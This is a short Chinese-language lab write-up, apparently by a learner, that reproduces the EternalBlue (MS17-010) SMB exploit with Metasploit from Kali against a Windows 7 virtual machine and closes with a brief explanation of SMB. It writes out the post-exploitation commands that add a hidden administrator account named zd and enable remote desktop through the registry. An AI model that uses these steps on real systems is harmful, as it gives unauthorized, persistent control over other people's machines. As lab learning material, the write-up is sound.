准备:
攻击机:kali
靶机:Windows7
配置:确保双方能够互ping成功
ifconfig命令查看Kali的IP地址
ipconfig查看Windows7的IP地址
双方都可以互ping成功
我用到的软件是Kali中的metasploitframework软件
search ms17-010搜索ms17-010这个漏洞
给我了几个漏洞方法,我是一个一个试的,最后发现第0个可以使用成功
shell命令进入Windows7的命令行
可以看到我已经进入到了
C:\Windows\system32>
这个操作系统了。但是它有乱码,用chcp 65001命令调整一下。接着ipconfig命令查看windows7的操作命令。
这就是我们之前win7的操作页面了。
同样的我用netstat命令在win7查看连接情况,发现我的Kali已经连接上了这个win7,通过TCP
用net user zd 123456 /add命令来创建一个名为zd,密码为123456的用户。
用net localgroup administrators zd /add把zd用户设置为Windows7中的最高管理员权限的一个账户了
然后我们还要开启Windows7的远程功能,才能够控制这个win7,
用以下的命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
开启了远程功能后就可以用rdesktop 192.168.217.132命令来访问Windows7的桌面了
然后其他用其他用户登录我们刚刚创建的zd用户就可以登录啦
成功登录到卓面
那么Windows7原来的用户就会被剔下来了
总结:永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
我们要确保靶机的445端口是打开的。
通过这次复现让我简单的认识了渗透。